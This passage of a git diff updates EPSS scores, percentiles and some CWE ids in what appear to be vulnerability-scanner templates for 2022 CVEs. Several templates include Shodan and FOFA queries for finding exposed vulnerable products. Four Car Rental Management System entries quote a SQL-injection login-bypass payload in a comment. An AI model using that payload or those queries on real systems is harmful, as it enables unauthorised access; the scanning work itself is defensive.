cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.76135 metadata: max-request: 1 verified: "true" diff --git a/http/cves/2022/CVE-2022-31984.yaml b/http/cves/2022/CVE-2022-31984.yaml index a93e4ca5eb..f9cb81a968 100644 --- a/http/cves/2022/CVE-2022-31984.yaml +++ b/http/cves/2022/CVE-2022-31984.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.2 cve-id: CVE-2022-31984 cwe-id: CWE-89 - epss-score: 0.00549 + epss-score: 0.00618 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.76135 metadata: max-request: 1 verified: "true" diff --git a/http/cves/2022/CVE-2022-32007.yaml b/http/cves/2022/CVE-2022-32007.yaml index fc74b4a272..223c1cdcf7 100644 --- a/http/cves/2022/CVE-2022-32007.yaml +++ b/http/cves/2022/CVE-2022-32007.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.2 cve-id: CVE-2022-32007 cwe-id: CWE-89 - epss-score: 0.00549 + epss-score: 0.00618 cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.76135 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-32015.yaml b/http/cves/2022/CVE-2022-32015.yaml index d86d59ee0a..fab150e70f 100644 --- a/http/cves/2022/CVE-2022-32015.yaml +++ b/http/cves/2022/CVE-2022-32015.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.2 cve-id: CVE-2022-32015 cwe-id: CWE-89 - epss-score: 0.00549 + epss-score: 0.00618 cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.76135 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-32018.yaml b/http/cves/2022/CVE-2022-32018.yaml index ad036b5447..bbd027dd25 100644 --- a/http/cves/2022/CVE-2022-32018.yaml +++ b/http/cves/2022/CVE-2022-32018.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.2 cve-id: CVE-2022-32018 cwe-id: CWE-89 - epss-score: 0.00549 + epss-score: 0.00618 cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.76135 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-32022.yaml b/http/cves/2022/CVE-2022-32022.yaml index 4c14fcd2fa..1ca0b0cfb6 100644 --- a/http/cves/2022/CVE-2022-32022.yaml +++ b/http/cves/2022/CVE-2022-32022.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.2 cve-id: CVE-2022-32022 cwe-id: CWE-89 - epss-score: 0.00687 + epss-score: 0.00773 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.79045 metadata: max-request: 2 shodan-query: http.html:"Car Rental Management System" diff --git a/http/cves/2022/CVE-2022-32024.yaml b/http/cves/2022/CVE-2022-32024.yaml index 9936f4b841..2bdcdb0d2b 100644 --- a/http/cves/2022/CVE-2022-32024.yaml +++ b/http/cves/2022/CVE-2022-32024.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.2 cve-id: CVE-2022-32024 cwe-id: CWE-89 - epss-score: 0.00549 + epss-score: 0.00618 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.76135 metadata: max-request: 2 comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. diff --git a/http/cves/2022/CVE-2022-32025.yaml b/http/cves/2022/CVE-2022-32025.yaml index 4a67aed1e6..ffcae1490b 100644 --- a/http/cves/2022/CVE-2022-32025.yaml +++ b/http/cves/2022/CVE-2022-32025.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.2 cve-id: CVE-2022-32025 cwe-id: CWE-89 - epss-score: 0.00549 + epss-score: 0.00618 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.76135 metadata: max-request: 2 comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. diff --git a/http/cves/2022/CVE-2022-32026.yaml b/http/cves/2022/CVE-2022-32026.yaml index bdb7ebf992..0fc20e45a4 100644 --- a/http/cves/2022/CVE-2022-32026.yaml +++ b/http/cves/2022/CVE-2022-32026.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.2 cve-id: CVE-2022-32026 cwe-id: CWE-89 - epss-score: 0.00549 + epss-score: 0.00618 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.76135 metadata: max-request: 2 comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. diff --git a/http/cves/2022/CVE-2022-32028.yaml b/http/cves/2022/CVE-2022-32028.yaml index 96755b72c3..ca39e3c5bf 100644 --- a/http/cves/2022/CVE-2022-32028.yaml +++ b/http/cves/2022/CVE-2022-32028.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.2 cve-id: CVE-2022-32028 cwe-id: CWE-89 - epss-score: 0.00549 + epss-score: 0.00618 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.76135 metadata: max-request: 2 comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. diff --git a/http/cves/2022/CVE-2022-32094.yaml b/http/cves/2022/CVE-2022-32094.yaml index e40a384773..a7197b4b71 100644 --- a/http/cves/2022/CVE-2022-32094.yaml +++ b/http/cves/2022/CVE-2022-32094.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-32094 cwe-id: CWE-89 - epss-score: 0.00974 + epss-score: 0.01018 cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.81899 metadata: max-request: 1 shodan-query: http.html:"Hospital Management System" diff --git a/http/cves/2022/CVE-2022-32195.yaml b/http/cves/2022/CVE-2022-32195.yaml index 5535be93d7..5205abbf97 100644 --- a/http/cves/2022/CVE-2022-32195.yaml +++ b/http/cves/2022/CVE-2022-32195.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.001 cpe: cpe:2.3:a:edx:open_edx:*:*:*:*:*:*:*:* + epss-percentile: 0.4045 metadata: max-request: 1 comment: Hover the cursor on the redirect link diff --git a/http/cves/2022/CVE-2022-32409.yaml b/http/cves/2022/CVE-2022-32409.yaml index d67862e106..0daed12bb6 100644 --- a/http/cves/2022/CVE-2022-32409.yaml +++ b/http/cves/2022/CVE-2022-32409.yaml @@ -13,9 +13,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-32409 - cwe-id: CWE-94 - epss-score: 0.60525 + cwe-id: CWE-22 + epss-score: 0.5824 cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:* + epss-percentile: 0.97277 metadata: max-request: 1 shodan-query: http.html:"i3geo" diff --git a/http/cves/2022/CVE-2022-32429.yaml b/http/cves/2022/CVE-2022-32429.yaml index 8854e5acf7..26c383f2e1 100644 --- a/http/cves/2022/CVE-2022-32429.yaml +++ b/http/cves/2022/CVE-2022-32429.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-32429 cwe-id: CWE-287 - epss-score: 0.01391 + epss-score: 0.02276 cpe: cpe:2.3:o:megatech:msnswitch_firmware:mnt.2408:*:*:*:*:*:*:* + epss-percentile: 0.88224 metadata: max-request: 1 shodan-query: http.favicon.hash:-2073748627 || http.favicon.hash:-1721140132 diff --git a/http/cves/2022/CVE-2022-32444.yaml b/http/cves/2022/CVE-2022-32444.yaml index 8785a70a48..b9bd66dd54 100644 --- a/http/cves/2022/CVE-2022-32444.yaml +++ b/http/cves/2022/CVE-2022-32444.yaml @@ -14,8 +14,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-32444 cwe-id: CWE-601 - epss-score: 0.0021 + epss-score: 0.00285 cpe: cpe:2.3:a:yuba:u5cms:8.3.5:*:*:*:*:*:*:* + epss-percentile: 0.64698 metadata: max-request: 1 vendor: yuba diff --git a/http/cves/2022/CVE-2022-32770.yaml b/http/cves/2022/CVE-2022-32770.yaml index 9f3ca80134..03546aa711 100644 --- a/http/cves/2022/CVE-2022-32770.yaml +++ b/http/cves/2022/CVE-2022-32770.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-32770 cwe-id: CWE-79 - epss-score: 0.00089 + epss-score: 0.00103 cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:* + epss-percentile: 0.41266 metadata: max-request: 1 shodan-query: http.html:"AVideo" diff --git a/http/cves/2022/CVE-2022-32771.yaml b/http/cves/2022/CVE-2022-32771.yaml index 98d09a8a04..7c42dcfb48 100644 --- a/http/cves/2022/CVE-2022-32771.yaml +++ b/http/cves/2022/CVE-2022-32771.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-32771 cwe-id: CWE-79 - epss-score: 0.00089 + epss-score: 0.00056 cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:* + epss-percentile: 0.21205 metadata: max-request: 1 shodan-query: http.html:"AVideo" diff --git a/http/cves/2022/CVE-2022-32772.yaml b/http/cves/2022/CVE-2022-32772.yaml index 39c73f34f1..8dcb8d66f8 100644 --- a/http/cves/2022/CVE-2022-32772.yaml +++ b/http/cves/2022/CVE-2022-32772.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-32772 cwe-id: CWE-79 - epss-score: 0.00089 + epss-score: 0.00056 cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:* + epss-percentile: 0.21205 metadata: max-request: 1 shodan-query: http.html:"AVideo" diff --git a/http/cves/2022/CVE-2022-33119.yaml b/http/cves/2022/CVE-2022-33119.yaml index bd34e11644..0d76389343 100644 --- a/http/cves/2022/CVE-2022-33119.yaml +++ b/http/cves/2022/CVE-2022-33119.yaml @@ -14,8 +14,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-33119 cwe-id: CWE-79 - epss-score: 0.01722 + epss-score: 0.02006 cpe: cpe:2.3:o:nuuo:nvrsolo_firmware:03.06.02:*:*:*:*:*:*:* + epss-percentile: 0.87424 metadata: max-request: 1 shodan-query: http.html:"NVRsolo" diff --git a/http/cves/2022/CVE-2022-33174.yaml b/http/cves/2022/CVE-2022-33174.yaml index 7ff24c0af1..0c4b1f8b75 100644 --- a/http/cves/2022/CVE-2022-33174.yaml +++ b/http/cves/2022/CVE-2022-33174.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-33174 cwe-id: CWE-863 - epss-score: 0.00494 + epss-score: 0.00505 cpe: cpe:2.3:o:powertekpdus:basic_pdu_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.73487 metadata: max-request: 1 shodan-query: http.html:"Powertek" diff --git a/http/cves/2022/CVE-2022-33891.yaml b/http/cves/2022/CVE-2022-33891.yaml index 2b069a23de..4fdd1dc3e1 100644 --- a/http/cves/2022/CVE-2022-33891.yaml +++ b/http/cves/2022/CVE-2022-33891.yaml @@ -16,9 +16,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-33891 - cwe-id: CWE-77 - epss-score: 0.97072 + cwe-id: CWE-78 + epss-score: 0.97023 cpe: cpe:2.3:a:apache:spark:*:*:*:*:*:*:*:* + epss-percentile: 0.99632 metadata: max-request: 1 shodan-query: title:"Spark Master at" diff --git a/http/cves/2022/CVE-2022-33901.yaml b/http/cves/2022/CVE-2022-33901.yaml index e05e0c8ec7..5492d38f2d 100644 --- a/http/cves/2022/CVE-2022-33901.yaml +++ b/http/cves/2022/CVE-2022-33901.yaml @@ -15,8 +15,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-33901 - epss-score: 0.00884 + epss-score: 0.00713 cpe: cpe:2.3:a:multisafepay:multisafepay_plugin_for_woocommerce:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.78038 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-33965.yaml b/http/cves/2022/CVE-2022-33965.yaml index db452e63c7..2236dd244c 100644 --- a/http/cves/2022/CVE-2022-33965.yaml +++ b/http/cves/2022/CVE-2022-33965.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-33965 cwe-id: CWE-89 - epss-score: 0.01053 + epss-score: 0.0098 cpe: cpe:2.3:a:plugins-market:wp_visitor_statistics:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.81511 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/wp-stats-manager" diff --git a/http/cves/2022/CVE-2022-34045.yaml b/http/cves/2022/CVE-2022-34045.yaml index 748008c929..af812b5753 100644 --- a/http/cves/2022/CVE-2022-34045.yaml +++ b/http/cves/2022/CVE-2022-34045.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-34045 cwe-id: CWE-798 - epss-score: 0.01844 + epss-score: 0.02393 cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* + epss-percentile: 0.8849 metadata: max-request: 1 shodan-query: http.html:"WN530HG4" diff --git a/http/cves/2022/CVE-2022-34046.yaml b/http/cves/2022/CVE-2022-34046.yaml index f8deee1def..c5a44b4e60 100644 --- a/http/cves/2022/CVE-2022-34046.yaml +++ b/http/cves/2022/CVE-2022-34046.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-34046 cwe-id: CWE-863 - epss-score: 0.25598 + epss-score: 0.22828 cpe: cpe:2.3:o:wavlink:wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:* + epss-percentile: 0.95888 metadata: max-request: 1 shodan-query: http.title:"Wi-Fi APP Login" diff --git a/http/cves/2022/CVE-2022-34047.yaml b/http/cves/2022/CVE-2022-34047.yaml index 61ef3f4e70..bd90f7ce7f 100644 --- a/http/cves/2022/CVE-2022-34047.yaml +++ b/http/cves/2022/CVE-2022-34047.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-34047 cwe-id: CWE-668 - epss-score: 0.27395 + epss-score: 0.24505 cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* + epss-percentile: 0.9601 metadata: max-request: 1 shodan-query: http.title:"Wi-Fi APP Login" diff --git a/http/cves/2022/CVE-2022-34048.yaml b/http/cves/2022/CVE-2022-34048.yaml index 5a44c8cf00..10dc812f78 100644 --- a/http/cves/2022/CVE-2022-34048.yaml +++ b/http/cves/2022/CVE-2022-34048.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-34048 cwe-id: CWE-79 - epss-score: 0.00072 + epss-score: 0.0009 cpe: cpe:2.3:o:wavlink:wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:* + epss-percentile: 0.37601 metadata: max-request: 1 shodan-query: http.html:"Wavlink" diff --git a/http/cves/2022/CVE-2022-34049.yaml b/http/cves/2022/CVE-2022-34049.yaml index ba547eb14e..c7296ee39c 100644 --- a/http/cves/2022/CVE-2022-34049.yaml +++ b/http/cves/2022/CVE-2022-34049.yaml @@ -17,8 +17,9 @@ info: cvss-score: 5.3 cve-id: CVE-2022-34049 cwe-id: CWE-552 - epss-score: 0.19026 + epss-score: 0.17531 cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* + epss-percentile: 0.95436 metadata: max-request: 1 shodan-query: http.title:"Wi-Fi APP Login" diff --git a/http/cves/2022/CVE-2022-34121.yaml b/http/cves/2022/CVE-2022-34121.yaml index 03d058b1f9..e3068e4155 100644 --- a/http/cves/2022/CVE-2022-34121.yaml +++ b/http/cves/2022/CVE-2022-34121.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-34121 cwe-id: CWE-829 - epss-score: 0.70306 + epss-score: 0.71421 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* + epss-percentile: 0.97623 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-34328.yaml b/http/cves/2022/CVE-2022-34328.yaml index 2e2556ec8c..84f87b78be 100644 --- a/http/cves/2022/CVE-2022-34328.yaml +++ b/http/cves/2022/CVE-2022-34328.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-34328 cwe-id: CWE-79 - epss-score: 0.001 + epss-score: 0.00099 cpe: cpe:2.3:a:pmb_project:pmb:7.3.10:*:*:*:*:*:*:* + epss-percentile: 0.40272 metadata: max-request: 1 shodan-query: http.html:"PMB Group" diff --git a/http/cves/2022/CVE-2022-34576.yaml b/http/cves/2022/CVE-2022-34576.yaml index 6c3d0578ce..ca45419326 100644 --- a/http/cves/2022/CVE-2022-34576.yaml +++ b/http/cves/2022/CVE-2022-34576.yaml @@ -13,8 +13,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-34576 - epss-score: 0.00853 + epss-score: 0.01703 cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:* + epss-percentile: 0.86191 metadata: max-request: 1 shodan-query: http.html:"Wavlink" diff --git a/http/cves/2022/CVE-2022-34590.yaml b/http/cves/2022/CVE-2022-34590.yaml index 24b1bb7f58..da0480fc05 100644 --- a/http/cves/2022/CVE-2022-34590.yaml +++ b/http/cves/2022/CVE-2022-34590.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.2 cve-id: CVE-2022-34590 cwe-id: CWE-89 - epss-score: 0.00416 + epss-score: 0.00549 cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.74559 metadata: max-request: 1 shodan-query: http.html:"Hospital Management System" diff --git a/http/cves/2022/CVE-2022-34753.yaml b/http/cves/2022/CVE-2022-34753.yaml index 57b5d8c1ff..7d76161ca1 100644 --- a/http/cves/2022/CVE-2022-34753.yaml +++ b/http/cves/2022/CVE-2022-34753.yaml @@ -16,8 +16,9 @@ info: cvss-score: 8.8 cve-id: CVE-2022-34753 cwe-id: CWE-78 - epss-score: 0.97087 + epss-score: 0.97007 cpe: cpe:2.3:o:schneider-electric:spacelogic_c-bus_home_controller_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.99625 metadata: max-request: 1 shodan-query: html:"SpaceLogic C-Bus" diff --git a/http/cves/2022/CVE-2022-3484.yaml b/http/cves/2022/CVE-2022-3484.yaml index 04930419b0..60e1d35a5d 100644 --- a/http/cves/2022/CVE-2022-3484.yaml +++ b/http/cves/2022/CVE-2022-3484.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00071 cpe: cpe:2.3:a:wpb_show_core_project:wpb_show_core:-:*:*:*:*:wordpress:*:* + epss-percentile: 0.29012 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-3506.yaml b/http/cves/2022/CVE-2022-3506.yaml index b4d9d8b66e..a88a926ac6 100644 --- a/http/cves/2022/CVE-2022-3506.yaml +++ b/http/cves/2022/CVE-2022-3506.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00077 cpe: cpe:2.3:a:never5:related_posts:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.31728 metadata: max-request: 4 verified: true diff --git a/http/cves/2022/CVE-2022-35151.yaml b/http/cves/2022/CVE-2022-35151.yaml index 1f01f52341..182ce4a23a 100644 --- a/http/cves/2022/CVE-2022-35151.yaml +++ b/http/cves/2022/CVE-2022-35151.yaml @@ -14,8 +14,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-35151 cwe-id: CWE-79 - epss-score: 0.01863 + epss-score: 0.01162 cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* + epss-percentile: 0.83115 metadata: max-request: 1 shodan-query: http.html:"kkFileView" diff --git a/http/cves/2022/CVE-2022-35405.yaml b/http/cves/2022/CVE-2022-35405.yaml index 7df3268c3e..821fc78078 100644 --- a/http/cves/2022/CVE-2022-35405.yaml +++ b/http/cves/2022/CVE-2022-35405.yaml @@ -16,8 +16,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-35405 - epss-score: 0.97529 + cwe-id: CWE-502 + epss-score: 0.97514 cpe: cpe:2.3:a:zohocorp:manageengine_access_manager_plus:*:*:*:*:*:*:*:* + epss-percentile: 0.99972 metadata: max-request: 1 shodan-query: http.title:"ManageEngine" diff --git a/http/cves/2022/CVE-2022-35413.yaml b/http/cves/2022/CVE-2022-35413.yaml index 396cd114d2..6e0066bfde 100644 --- a/http/cves/2022/CVE-2022-35413.yaml +++ b/http/cves/2022/CVE-2022-35413.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-35413 cwe-id: CWE-798 - epss-score: 0.8597 + epss-score: 0.82988 cpe: cpe:2.3:a:pentasecurity:wapples:*:*:*:*:*:*:*:* + epss-percentile: 0.97987 metadata: max-request: 1 shodan-query: http.title:"Intelligent WAPPLES" diff --git a/http/cves/2022/CVE-2022-35416.yaml b/http/cves/2022/CVE-2022-35416.yaml index 5d51f281c8..209a80100c 100644 --- a/http/cves/2022/CVE-2022-35416.yaml +++ b/http/cves/2022/CVE-2022-35416.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-35416 cwe-id: CWE-79 - epss-score: 0.00078 + epss-score: 0.00099 cpe: cpe:2.3:a:h3c:ssl_vpn:*:*:*:*:*:*:*:* + epss-percentile: 0.40272 metadata: max-request: 1 shodan-query: http.html_hash:510586239 diff --git a/http/cves/2022/CVE-2022-35493.yaml b/http/cves/2022/CVE-2022-35493.yaml index 115bcc7e04..42c362c0dd 100644 --- a/http/cves/2022/CVE-2022-35493.yaml +++ b/http/cves/2022/CVE-2022-35493.yaml @@ -14,8 +14,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-35493 cwe-id: CWE-79 - epss-score: 0.00099 + epss-score: 0.00134 cpe: cpe:2.3:a:wrteam:eshop_-_ecommerce_\/_store_website:*:*:*:*:*:*:*:* + epss-percentile: 0.47885 metadata: max-request: 1 shodan-query: http.html:"eShop - Multipurpose Ecommerce" diff --git a/http/cves/2022/CVE-2022-3578.yaml b/http/cves/2022/CVE-2022-3578.yaml index 1da4d98fb0..d54c4959c0 100644 --- a/http/cves/2022/CVE-2022-3578.yaml +++ b/http/cves/2022/CVE-2022-3578.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00071 cpe: cpe:2.3:a:metagauss:profilegrid:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.29012 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-35914.yaml b/http/cves/2022/CVE-2022-35914.yaml index 6483172929..b5a822aea4 100644 --- a/http/cves/2022/CVE-2022-35914.yaml +++ b/http/cves/2022/CVE-2022-35914.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-35914 cwe-id: CWE-74 - epss-score: 0.97399 + epss-score: 0.9739 cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* + epss-percentile: 0.9987 metadata: max-request: 1 shodan-query: http.favicon.hash:"-1474875778" diff --git a/http/cves/2022/CVE-2022-36446.yaml b/http/cves/2022/CVE-2022-36446.yaml index 2fe5eade53..b643a496a5 100644 --- a/http/cves/2022/CVE-2022-36446.yaml +++ b/http/cves/2022/CVE-2022-36446.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-36446 cwe-id: CWE-116 - epss-score: 0.97188 + epss-score: 0.97228 cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:* + epss-percentile: 0.99749 metadata: max-request: 2 shodan-query: title:"Webmin" diff --git a/http/cves/2022/CVE-2022-36537.yaml b/http/cves/2022/CVE-2022-36537.yaml index 75709f58d7..352b581f87 100644 --- a/http/cves/2022/CVE-2022-36537.yaml +++ b/http/cves/2022/CVE-2022-36537.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-36537 cwe-id: CWE-200 - epss-score: 0.96509 + epss-score: 0.96802 cpe: cpe:2.3:a:zkoss:zk_framework:*:*:*:*:*:*:*:* + epss-percentile: 0.99539 metadata: max-request: 2 shodan-query: http.title:"Server backup manager" diff --git a/http/cves/2022/CVE-2022-36642.yaml b/http/cves/2022/CVE-2022-36642.yaml index 192db46222..9cf183f1b2 100644 --- a/http/cves/2022/CVE-2022-36642.yaml +++ b/http/cves/2022/CVE-2022-36642.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-36642 cwe-id: CWE-862 - epss-score: 0.7381 + epss-score: 0.74091 cpe: cpe:2.3:o:telosalliance:omnia_mpx_node_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.97696 metadata: max-request: 2 shodan-query: http.title:"Omnia MPX Node | Login" diff --git a/http/cves/2022/CVE-2022-36804.yaml b/http/cves/2022/CVE-2022-36804.yaml index 93b8bf9268..1c310ff8b2 100644 --- a/http/cves/2022/CVE-2022-36804.yaml +++ b/http/cves/2022/CVE-2022-36804.yaml @@ -17,8 +17,9 @@ info: cvss-score: 8.8 cve-id: CVE-2022-36804 cwe-id: CWE-77 - epss-score: 0.97134 + epss-score: 0.97338 cpe: cpe:2.3:a:atlassian:bitbucket:*:*:*:*:*:*:*:* + epss-percentile: 0.99822 metadata: max-request: 2 shodan-query: http.component:"BitBucket" @@ -57,12 +58,14 @@ http: json: - '.["values"] | .[] | .["project"] | .key' part: body - - type: json # type of the extractor + + - type: json name: slug internal: true json: - '.["values"] | .[] | .slug' part: body + - type: regex group: 1 regex: diff --git a/http/cves/2022/CVE-2022-36883.yaml b/http/cves/2022/CVE-2022-36883.yaml index 0e3824817d..837a4b7639 100644 --- a/http/cves/2022/CVE-2022-36883.yaml +++ b/http/cves/2022/CVE-2022-36883.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-36883 cwe-id: CWE-862 - epss-score: 0.01011 + epss-score: 0.01083 cpe: cpe:2.3:a:jenkins:git:*:*:*:*:*:jenkins:*:* + epss-percentile: 0.825 metadata: max-request: 1 shodan-query: X-Jenkins diff --git a/http/cves/2022/CVE-2022-37042.yaml b/http/cves/2022/CVE-2022-37042.yaml index 581f54f4f1..6990e10e4e 100644 --- a/http/cves/2022/CVE-2022-37042.yaml +++ b/http/cves/2022/CVE-2022-37042.yaml @@ -16,9 +16,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-37042 - cwe-id: CWE-287 - epss-score: 0.97371 + cwe-id: CWE-22 + epss-score: 0.97489 cpe: cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:* + epss-percentile: 0.99954 metadata: max-request: 4 fofa-query: app="zimbra-邮件系统" diff --git a/http/cves/2022/CVE-2022-37153.yaml b/http/cves/2022/CVE-2022-37153.yaml index eb0a549f68..887d7f8504 100644 --- a/http/cves/2022/CVE-2022-37153.yaml +++ b/http/cves/2022/CVE-2022-37153.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00116 cpe: cpe:2.3:a:articatech:artica_proxy:4.30.000000:*:*:*:*:*:*:* + epss-percentile: 0.44709 metadata: max-request: 1 shodan-query: http.html:"Artica" diff --git a/http/cves/2022/CVE-2022-37190.yaml b/http/cves/2022/CVE-2022-37190.yaml index d5a0c714e1..ff723c273f 100644 --- a/http/cves/2022/CVE-2022-37190.yaml +++ b/http/cves/2022/CVE-2022-37190.yaml @@ -14,8 +14,9 @@ info: cvss-score: 8.8 cve-id: CVE-2022-37190 cwe-id: CWE-732 - epss-score: 0.02513 + epss-score: 0.01712 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* + epss-percentile: 0.86233 metadata: max-request: 3 verified: true diff --git a/http/cves/2022/CVE-2022-37191.yaml b/http/cves/2022/CVE-2022-37191.yaml index ae7e583b44..5cd541edac 100644 --- a/http/cves/2022/CVE-2022-37191.yaml +++ b/http/cves/2022/CVE-2022-37191.yaml @@ -14,8 +14,9 @@ info: cvss-score: 6.5 cve-id: CVE-2022-37191 cwe-id: CWE-829 - epss-score: 0.39852 + epss-score: 0.28873 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* + epss-percentile: 0.96273 metadata: max-request: 3 verified: true diff --git a/http/cves/2022/CVE-2022-37299.yaml b/http/cves/2022/CVE-2022-37299.yaml index ae8e78f9b1..fb518cf237 100644 --- a/http/cves/2022/CVE-2022-37299.yaml +++ b/http/cves/2022/CVE-2022-37299.yaml @@ -14,8 +14,9 @@ info: 